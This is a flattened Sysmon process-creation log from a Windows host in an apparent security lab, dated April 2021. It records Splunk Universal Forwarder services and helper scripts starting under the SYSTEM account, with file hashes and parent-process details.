--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005161Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:23.740{A8622C2F-3EC3-6078-E800-00000000AE01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005147Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:22.614{A8622C2F-3EC2-6078-E700-00000000AE01}3684C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:21.942{A8622C2F-3EC1-6078-E600-00000000AE01}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005117Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:21.098{A8622C2F-3EC1-6078-E500-00000000AE01}4488C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005003Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:26.334{A8622C2F-3E8A-6078-E300-00000000AE01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004982Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:25.700{A8622C2F-3E89-6078-E200-00000000AE01}4508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004967Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:25.027{A8622C2F-3E89-6078-E100-00000000AE01}2684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004953Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:24.355{A8622C2F-3E88-6078-E000-00000000AE01}4504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004936Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:23.683{A8622C2F-3E87-6078-DF00-00000000AE01}2592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:23.056{A8622C2F-3E87-6078-DE00-00000000AE01}2220C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:22.540{A8622C2F-3E86-6078-DD00-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004891Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:21.867{A8622C2F-3E85-6078-DC00-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004867Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:21.194{A8622C2F-3E85-6078-DB00-00000000AE01}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004850Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:20.522{A8622C2F-3E84-6078-DA00-00000000AE01}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:19.849{A8622C2F-3E83-6078-D900-00000000AE01}4228C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=9916D1AB54ACD0592052F87DFDBFD5F8,SHA256=704C0DEC2F15B4ADBC3165475D0F6504C90AD8B28B6926F7EAD67C2F2CCE77F5,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004822Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:17.219{A8622C2F-3E81-6078-D800-00000000AE01}3624C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe" --schemeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=9916D1AB54ACD0592052F87DFDBFD5F8,SHA256=704C0DEC2F15B4ADBC3165475D0F6504C90AD8B28B6926F7EAD67C2F2CCE77F5,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:16.940{A8622C2F-3E80-6078-D700-00000000AE01}3580C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004796Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:16.830{A8622C2F-3E80-6078-D600-00000000AE01}3736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004783Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:16.721{A8622C2F-3E80-6078-D500-00000000AE01}4996C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004770Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:16.611{A8622C2F-3E80-6078-D400-00000000AE01}5080C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:16.501{A8622C2F-3E80-6078-D300-00000000AE01}4896C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004744Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:16.392{A8622C2F-3E80-6078-D200-00000000AE01}4884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004731Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:16.282{A8622C2F-3E80-6078-D100-00000000AE01}4868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004718Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:16.174{A8622C2F-3E80-6078-D000-00000000AE01}4828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004705Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:16.063{A8622C2F-3E80-6078-CF00-00000000AE01}4696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004692Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:15.957{A8622C2F-3E7F-6078-CE00-00000000AE01}4680C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004678Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:15.729{A8622C2F-3E7F-6078-CD00-00000000AE01}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3E7F-6078-CC00-00000000AE01}3536C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 154100x80000000000000004665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:15.724{A8622C2F-3E7F-6078-CC00-00000000AE01}3536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:15.434{A8622C2F-3E7F-6078-CB00-00000000AE01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7F-6078-CA00-00000000AE01}3940C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x80000000000000004637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:15.427{A8622C2F-3E7F-6078-CA00-00000000AE01}3940C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7F-6078-C900-00000000AE01}4656C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 154100x80000000000000004624Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:15.422{A8622C2F-3E7F-6078-C900-00000000AE01}4656C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7D-6078-BC00-00000000AE01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000004610Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:15.134{A8622C2F-3E7F-6078-C800-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT 